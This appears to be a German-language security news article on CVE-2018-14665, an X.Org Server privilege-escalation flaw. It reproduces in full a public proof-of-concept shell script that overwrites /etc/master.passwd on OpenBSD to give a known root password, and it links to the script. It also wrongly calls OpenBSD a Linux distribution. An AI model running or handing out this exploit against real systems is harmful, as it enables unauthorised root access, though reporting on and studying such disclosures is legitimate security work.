
OpenBsd_CVE-2018-14665
Der indische Sicherheitsforscher Narendra Shinde entdeckte eine kritische Schwachstelle (CVE-2018-14665) in der X.Org Server-Software, die eine Privilegieneskalation auf Root von einem normalen Benutzerkonto aus ermöglicht. Sie betrifft die wichtigsten Linux-Distributionen, darunter OpenBSD, Debian, Ubuntu, CentOS, Red Hat und Fedora.
Das Xorg X-Projekt bietet eine Open-Source-Implementierung des X Window Systems (auch bekannt als X11 oder einfach X, ein Fenstersystem für Bitmap-Displays). Es stellt die grundlegende Umgebung für eine grafische Benutzeroberfläche bereit: Zeichnen und Verschieben von Fenstern auf dem Anzeigegerät sowie Interaktion mit Maus und Tastatur.
Shinde entdeckte, dass der Xorg X-Server die Argumente für mindestens die folgenden beiden Befehlszeilenparameter nicht korrekt verarbeitet und validiert:
-modulepath: Legt das Verzeichnis fest, in dem nach Xorg-Servermodulen gesucht wird,-logfile: Legt eine neue Protokolldatei für den Xorg-Server fest, anstatt das Standardprotokoll unter /var/log/Xorg.n.log zu verwenden, wie es auf den meisten Plattformen der Fall ist.Laut Narendra Shinde können Benutzer mit niedrigen Berechtigungen diese ausnutzen, um bösartigen Code auszuführen und beliebige Dateien im System zu überschreiben.
Die Schwachstelle wurde vor mehr als zwei Jahren im X.Org Server 1.19.0-Paket eingeführt.
Xorg veröffentlichte ein Sicherheitsbulletin zur Schwachstelle CVE-2018-14665.
„Wenn der X-Server mit erhöhten Berechtigungen ausgeführt wird (d. h. Xorg ist installiert, das setuid-Bit gesetzt und der Server wird von einem Nicht-Root-Benutzer gestartet).“ liest man in der Xorg-Empfehlung.
„Der Parameter -modulepath kann verwendet werden, um einen unsicheren Pfad für Module anzugeben, die im X-Server geladen werden sollen, was die Ausführung von nicht privilegiertem Code in einem privilegierten Prozess ermöglicht.
Aufgrund einer fehlerhaften Überprüfung beim Parsen der Optionen kann der Parameter -logfile verwendet werden, um beliebige Dateien im Dateisystem zu überschreiben.“
Der Sicherheitsexperte Matthew Hickey veröffentlichte außerdem einen Proof-of-Concept-Exploit-Code, der es einem Angreifer ermöglicht, ein anfälliges System mit drei oder weniger Befehlen zu übernehmen.
Der #0day LPE für OpenBSD über CVE-2018-14665 kann von einer entfernten SSH-Sitzung ausgelöst werden, ohne dass eine lokale Konsole erforderlich ist. Ein Angreifer kann das betroffene System buchstäblich mit drei Befehlen oder weniger übernehmen.
Exploit-Skript: https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh

#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root.
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD. Errata: was
# unpatched 0day for a day on release by Xorg for
# OpenBSD systems - patched 26-10-2018.
#
# Credit for cve-2018-14665 goes to Narendra Shinde.
# Theo explains why this flaw made it into OpenBSD
# stable releases (tested 6.3 & 6.4) as 0day himself
# here:
#
# https://marc.info/?l=openbsd-tech&r=1&b=201810&w=2
#
# "That is the first localhost root hole in quite a
# long time." - Theo de Raadt 25/10/18
#
# This exploit works on OpenBSD 6.3 and 6.4, ymmv.
# requires the ability to run "su" and a local
# account. Run this exploit once and it will backup
# the original passwd file to /etc/master.passwd.old
#
# - https://hacker.house
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old back
echo [+] type 'Password1' and hit enter for root
su -
Password1. Die ursprüngliche /etc/passwd-Datei des Systems wird unter /etc/master.passwd.old gesichert.https://twitter.com/hackerfantastic
https://securityaffairs.co/wordpress/77402/hacking/cve-2018-14665-linux-distros.html
https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh